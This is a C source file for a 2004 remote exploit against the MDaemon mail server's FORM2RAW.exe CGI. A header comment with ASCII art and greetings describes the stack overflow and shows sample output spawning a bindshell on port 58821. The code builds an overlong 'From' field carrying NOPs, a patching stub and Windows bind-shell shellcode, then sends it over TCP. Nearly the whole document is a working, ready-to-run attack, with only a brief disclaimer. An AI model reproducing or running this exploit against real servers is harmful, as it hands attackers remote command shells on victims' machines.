/* Copyright ?Rosiello Security http://www.rosiello.org ================ ____________ _.-----------------------/ `-,, ,' ; ; / `-._ ; ; ; .') \ `\ `--------------------.'.' _.-'`- . `\ ;`---'-------.\, `\ _ ;, ; .---`, ` - ;` ; `.____; `--------------'_ ,, ,; ; .---`, ` ._ ;; ; `.____; ___`````` `;--------------' ` ,; ; .---`, ;; ; `.____; `.------------' ``----...__ _..= `````---=-.---``'` _ | |_ |_ _| |_| /\ \ We /\ \ are /\ \ /::\ \ Black /::\ \ H@t \:\ \ /:/\:\ \ /:/\:\ \ \:\ \ _::\~\:\ \ _::\~\:\ \ /::\ \ /\ \:\ \:\__\ /\ \:\ \:\__\ /:/\:\__\ \:\ \:\ \/__/ \:\ \:\ \/__/ /:/ \/__/ \:\ \:\__\ \:\ \:\__\ /:/ / \:\/:/ / \:\/:/ / /:/ / \::/ / \::/ / /:/ / \/__/ \/__/ \/__/ airsupply@0x557.org http://www.0x557.org ================ --== Remote Exploit for Mdaemon version v6.85 and prior to 6.52 ==-- Code by: rave Contact: rave@rosiello.org Contact: airsupply@0x557.org Date: March 2004 Bug found by: hat-squad security ( great job !! ) MDaemon offers a full range of mail server functionality. MDaemon protects your users from spam and viruses, provides full security, includes seamless web access to your email via WorldClient, remote administration, and much more!".FORM2RAW.exe is a CGI that allows users to send emails using the MDaemon via a web page. It processes the fields of an HTML form and creates a raw message file in the raw queue directory of MDaemon mail server. This file then will be processed and queued for delivery by MDaemon. An attacker can cause a buffer overflow in MDaemon by issuing a malformed CGI request to FORM2RAW.exe. According to the Help file "By default, MDaemon 6.52 or higher will not send emails created by Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the MDaemon server. If you want to disable this behavior you can set the FromCheck=No in FORM2RAW.INI file". Sending more than 153 bytes in the "From" field to FROM2Raw.exe creates a raw file that when processed by MDaemon will cause a Stack buffer overflow. The EIP register will be overwritten when the From field length is 249 bytes Do i need to say more ? this is 0wnage 0ldsch00l style have fun.. This spawns a waiting bindshell on the victims computer at port 58821.. ps: The exploit has only been tested on Windows XP Home and pro edition (dutch) sp1 + the stack has been proofen to be verry humpy. So please dont yell it me if the exploit doesn't work on your Operative System .. thanks The demo mode of the exploit shows in the debugger the following EAX = 00000000 EBX = 00000000 ECX = 014D1BD8 EDX = 01090000 ESI = 014C6000 EDI = 01AEF1A8 EIP = 42424242 ESP = 01AEEEE8 EBP = 0005E668 Note:Demo mode works on all operative systems Usage Mdeamon_exp.exe Target Number Target Name Stack Adress ============= =========== =========== 0 Demo 0x42424242 1 Windows XP HOME [NL] 0x014D4DFC 2 Windows XP PRO [NL] 0x014D4DFC Mdeamon_exp localhost 1 [+] Winsock Inalized [+] Trying to connect to localhost:3000 [+] socket inalized [+] Overflowing string is Prepared [+] Connected [+] Overflowing string had been send telnet localhost 58821 Microsoft Windows XP [versie 5.1.2600] C) Copyright 1985-2001 Microsoft Corp. D:\MDaemon\APP> Special Thanks to: airsuppy { 0x557 security r0cked me, ty for u part and cooperationg bro } Silicon { Unofficial source`s told me ur a rosiello member good i lent ur bindcode TY 100% } Sam { once again 0x557 ty for the chat aldo it was a short one } Dragnet { Always willing to help me out } Angelo { Verry verry good friend } Punix { Last time i forgot you girl ! :( im so sorry } Greetz go out to: NrAziz { This is my brother anyone who touches him touches me, so pls make my day ! } sloth { good guy } Mercy { Hope to see u soon } Netric security { www.netric.org/.be } 0x557 security (SST) { www.0x557.org } [+] All the hax0rs i forgot. This was rosiello there first coorperation with the 0x557 ppl witch have been proofen to be realy nice, in the past rosiello has worked with (now death) DSR also known as dtors security research, but (and its a personal wish) hope that 0x557 still will be so nice for us. I feel my self called to give a great big shoutout to these ppl for there work for now and in the futhure !! keep on doing the great job !. Bad sounds of these days { i cant remember anything , can`t tell of this is trough or a dream. deep down down inside me i , feel the stream this terrable silence stop with me. Now that the warn is trough with me im waking up i can not see that there is nothing left of me nothing is real but pain now. } The original advisory can be found at: http://hat-squad.com/bugreport/mdaemon-raw.txt The mirored advisory can be fount at: http://www.securiteam.com/windowsntfocus/5ZP050ABPY.htm Our own Advisory can be found at : http://www.rosiello.org/en/read_bugs.php?17 !!!DO NOT USE THIS CODE ON DIFFERENT MACHINES BUT YOURS!!! Respect the law as we do! I'm outa here bye bye ! */ #include #include #include #include // Darn fucking 1337 macro shit #define ISIP(m) (!(inet_addr(m) ==-1)) #define offset 267 //;267 //1024 // hmm :D #define NOPS "\x90\x90\x90\x90\x90\x90\x90" struct sh_fix { unsigned long _wsasock; unsigned long _bind; unsigned long _listen; unsigned long _accept; unsigned long _stdhandle; unsigned long _system; } ; struct remote_targets { char *os; unsigned long sh_addr; struct sh_fix _sh_fix; } target [] ={ /* Option`s for your eyes only :D*/ "Demo ", 0x42424242, { 0x90909090, 0x90909090, 0x90909090, 0x90909090, 0x90909090,// <-- 0x90909090, }, "Windows XP HOME [NL]", 0x014D4DFC, { 0x71a35a01, 0x71a33ece, 0x71a35de2, 0x71a3868d, 0x77e6191d,// <-- 0x77bf8044, }, "Windows XP PRO [NL]", 0x014D4DFC, { 0x71a35a01, 0x71a33ece, 0x71a35de2, 0x71a3868d, 0x77e6191d,// <-- 0x77bf8044, } }; unsigned char _addy [] = "\x90\x90\x90\x90"; // 116 bytes bindcode for windows,(NTlike) port=58821, by silicon :) // w000w you rule !! unsigned char shellcode[] = "\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06" "\x6A\x01\x6A\x02\xB8" "\xAA\xAA\xAA\xAA" "\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0" "\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5" "\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8" "\xBB\xBB\xBB\xBB" "\xFF\xD0\x6A\x01\x53\xB8" "\xCC\xCC\xCC\xCC" "\xFF\xD0\x33\xC0\x50\x50\x53\xB8" "\xDD\xDD\xDD\xDD" "\xFF\xD0\x8B\xD8\xBA" "\xEE\xEE\xEE\xEE" "\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2" "\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63" "\x6D\x64\x8D\x45\xFC\x50\xB8" "\xFF\xFF\xFF\xFF" "\xFF\xD0\x41"; /* The funny thing is while exploiting this bug one of the adresses (see target[1 || 2].sh_addr) had a forbidden character (0x20 aka space) to fix this i wrote this addy/mini shellcode tho replace the 0x19 (thats not supposed to be there) in the SetStdHandle () adress inside the shellcode for an 0x20. */ unsigned char _me [] = "\x33\xC9" // xor ecx,ecx "\xBE\xAA\xAA\xAA\xAA" // mov esi,offset _shellcode (00421a50) "\x83\xC1\x1F" // add ecx,1Fh "\x41" // inc ecx "\x66\x89\x4E\x50" // mov word ptr [esi+50h],cx "\xC6\x46\x51\xE6"; // mov byte ptr [esi+51h],0E6h // now what would this button do ? char *host_ip; u_long get_ip(char *hostname) { struct hostent *hp; if (ISIP(hostname)) return inet_addr(hostname); if ((hp = gethostbyname(hostname))==NULL) { perror ("[+] gethostbyname() failed check the existance of the host.\n"); exit(-1); } return (inet_ntoa(*((struct in_addr *)hp->h_addr))); } int fix_shellcode ( int choise ) { unsigned long only_xp =target[choise].sh_addr+strlen(NOPS)+strlen(_me); memcpy(_me+3,((char *)&only_xp),4); //0xf offset to the adres of WSASocketA memcpy(shellcode+0xf,((char *)&target[choise]._sh_fix._wsasock),4); //0x30 offset to the adres of bind memcpy(shellcode+0x30,((char *)&target[choise]._sh_fix._bind),4); //0x3a offset to the adres of listen memcpy(shellcode+0x3a,((char *)&target[choise]._sh_fix._listen),4); //0x46 offset to the adres of _accept memcpy(shellcode+0x46,((char *)&target[choise]._sh_fix._accept),4); //0x4f offset to the adres of SetStdHandle memcpy(shellcode+0x4f,((char *)&target[choise]._sh_fix._stdhandle),4); //0x6e offset to the adres of SYSTEM memcpy(shellcode+0x6e,((char *)&target[choise]._sh_fix._system),4); return 0; } /// oooh yeah uuuh right .... Crap dont you uuh yeah at me you know me ! int usage (char *what) { int i; fprintf(stdout,"Copyright ?Rosiello Security\n"); fprintf(stdout,"http://www.rosiello.org\n\n"); fprintf(stdout,"Usage %s \n",what); fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Adress\n"); fprintf(stdout,"=============\t\t===========\t\t\t\t===========\n"); for (i=0;i < 3;i++) fprintf(stdout,"%d\t\t\t%s\t\t0x%p\n",i,target[i].os,target[i].sh_addr); exit(0); } int main(int argc,char **argv) { char buffer[offset*4]="get /form2raw.cgi?From=",*ptr,*address; int sd,oops,i,choise; struct sockaddr_in ooh; WSADATA wsadata; WSAStartup(0x101, &wsadata); if (argc < 2) usage(argv[0]); address=argv[1]; choise=atoi(argv[2]); fix_shellcode(choise); fprintf(stdout,"[+] Winsock Inalized\n"); /* Lets start making a litle setup Change the port if you have to */ ooh.sin_addr.s_addr = inet_addr(get_ip(address)); ooh.sin_port = htons(3000); ooh.sin_family = AF_INET; fprintf(stdout,"[+] Trying to connect to %s:%d\n",address,3000); // ok ok here`s ur sock() sd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP); if (!sd<0) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); } fprintf(stdout,"[+] socket inalized\n"); /* inalizing the expploiting buffer read the file comments for the details */ ptr=buffer+strlen(buffer); for (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x40; sprintf(buffer+strlen(buffer),"%s%s&To=airsupply@0x557.org&Subject=hi&Body=%s%s%s HTTP/1.0\r\n\r\n", ((char *)&target[choise].sh_addr),_addy,NOPS,_me,shellcode); //memcpy(buffer+35,shellcode,strlen(shellcode)); fprintf(stdout,"[+] Overflowing string is Prepared\n"); // Knock knock ... hi i want to hook up with you oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh )); if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); } // yep wher`e in :D fprintf(stdout,"[+] Connected\n"); // Sending some Dangerous stuff i = send(sd,buffer,strlen(buffer),0); if (!i <0) { fprintf (stdout,"[!] Send() failed\n"); exit (-1) ; } fprintf(stdout,"[+] Overflowing string had been send\n"); // Bring in the cleaners !! WSACleanup(); // [EOF] return 0; }

��ŷ��